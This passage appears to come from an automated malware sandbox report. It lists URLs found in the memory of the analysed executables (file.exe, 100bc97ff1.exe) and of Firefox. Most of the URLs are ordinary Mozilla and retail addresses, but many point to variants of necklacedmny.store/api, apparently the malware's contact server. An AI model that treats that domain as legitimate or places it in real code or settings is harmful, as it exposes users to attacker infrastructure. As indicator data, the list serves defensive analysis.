00000013.00000003.2329931380.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300881497.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.1328162370.0000000005730000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1328308181.0000000005733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/((
Source: 100bc97ff1.exe, 00000013.00000003.2269828204.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/.
Source: file.exe, 00000000.00000003.1510540713.0000000005722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/18
Source: file.exe, 00000000.00000003.1358610666.0000000001140000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358231730.0000000001139000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358269876.000000000113E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358131343.000000000112E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358160028.0000000001136000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358182199.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/2
Source: 100bc97ff1.exe, 00000013.00000003.2325695916.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329931380.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284782172.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2534728994.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/6
Source: file.exe, 00000000.00000003.1341021318.000000000572E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1341227914.000000000572F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1340877623.000000000572E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/G
Source: file.exe, 00000000.00000003.1510540713.0000000005722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/I83
Source: 100bc97ff1.exe, 00000015.00000002.2538720505.00000000013CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/P
Source: file.exe, 00000000.00000003.1341021318.000000000572E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1341227914.000000000572F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1340877623.000000000572E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/W
Source: file.exe, file.exe, 00000000.00000003.1356311338.000000000573E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1386600765.0000000001137000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1375308946.000000000113C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1376008712.000000000113E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1356036529.0000000005738000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510608776.0000000001133000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510713355.000000000111F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510777473.0000000001136000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358131343.000000000112E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1375963006.0000000001134000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358160028.0000000001136000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1375452154.000000000113E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1375979207.000000000113A000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2559898782.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284289932.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284222994.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269895043.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300426734.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269779163.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.1386600765.0000000001137000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510608776.0000000001133000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510777473.0000000001136000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api#
Source: 100bc97ff1.exe, 00000013.00000002.2559898782.00000000056F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiD
Source: 100bc97ff1.exe, 00000013.00000003.2269895043.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269779163.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269924686.0000000000E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiF
Source: 100bc97ff1.exe, 00000015.00000003.2474497787.00000000013A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiJ9
Source: 100bc97ff1.exe, 00000015.00000002.2534637202.0000000001325000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiV
Source: file.exe, 00000000.00000003.1358131343.000000000112E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1358160028.0000000001136000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apisQ-1
Source: 100bc97ff1.exe, 00000015.00000002.2534637202.0000000001346000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apitat
Source: 100bc97ff1.exe, 00000013.00000003.2251676644.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiws
Source: 100bc97ff1.exe, 00000013.00000002.2538318923.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api~
Source: 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/p
Source: file.exe, 00000000.00000003.1386600765.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/r
Source: 100bc97ff1.exe, 00000013.00000003.2304213166.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/~
Source: 100bc97ff1.exe, 00000015.00000002.2534637202.0000000001325000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/apil
Source: 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2301246829.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/apinecklacedmny.storenecklacedmny.store
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000024.00000002.2926560740.000001DF1C894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000024.00000002.2951762361.000001DF201E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2924896477.000001DF1C617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/main/url-classifier-skip-urls
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2924896477.000001DF1C617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000024.00000002.2942538324.000001DF1F95C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000024.00000002.2942538324.000001DF1F95C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Extensions
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/This
Source: firefox.exe, 00000024.00000002.2913857704.000001DF1BC12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userREADER_MODE_DOWNLOAD_RESULT
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2954748532.000001DF205C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF20912000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2957011320.000001DF207C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2954748532.000001DF205C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF20912000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000024.00000002.2947940979.000001DF1FECB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2913857704.000001DF1BC43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2926560740.000001DF1C8F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2796802534.000001DF1A7FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2949252169.000001DF1FF47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2481478115.000001DF212A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2966341812.000001DF212A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000024.00000002.2949252169.000001DF1FFBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000024.00000002.2971880123.000001DF22206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpSELECT
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2971174931.000001DF22184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000024.00000002.2971880123.000001DF222A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsresource://devtools/client/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/update-firefox-latest-release
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesCaptiveProtalDetector
Source: 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000024.00000002.2945767195.000001DF1FDD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2939059003.000001DF1F2E0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2939059003.000001DF1F2E0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2939059003.000001DF1F2E0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2939059003.000001DF1F2E0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000024.00000002.2935278544.000001DF1EDA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2473695285.000001DF22BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000024.00000003.2405355809.000001DF1EB40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=app-builtin:wikipedia
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=resource://gre/modules/FxAccountsCommands.sys.mjs
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: file.exe, 00000000.00000003.1342792101.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2300912245.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329858713.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2309734224.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2301246829.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503189441.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357249097.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325565887.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2473488619.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2954748532.000001DF205C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000024.00000002.2947940979.000001DF1FECB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2542266761.000000BA7F8FC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2939626250.000001DF1F475000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2913857704.000001DF1BC43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000024.00000002.2939626250.000001DF1F438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20256000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: firefox.exe, 00000024.00000002.2949252169.000001DF1FFBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000024.00000002.2956116951.000001DF206F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1342345651.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2286841217.0000000005813000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2945767195.000001DF1FDD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: firefox.exe, 00000024.00000002.2949252169.000001DF1FFBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/Sqlite.sys.mjsgetUserContextIdForOpenPage
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: file.exe, 00000000.00000003.1342345651.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2286841217.0000000005813000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2456315969.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2967410154.000001DF2151C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
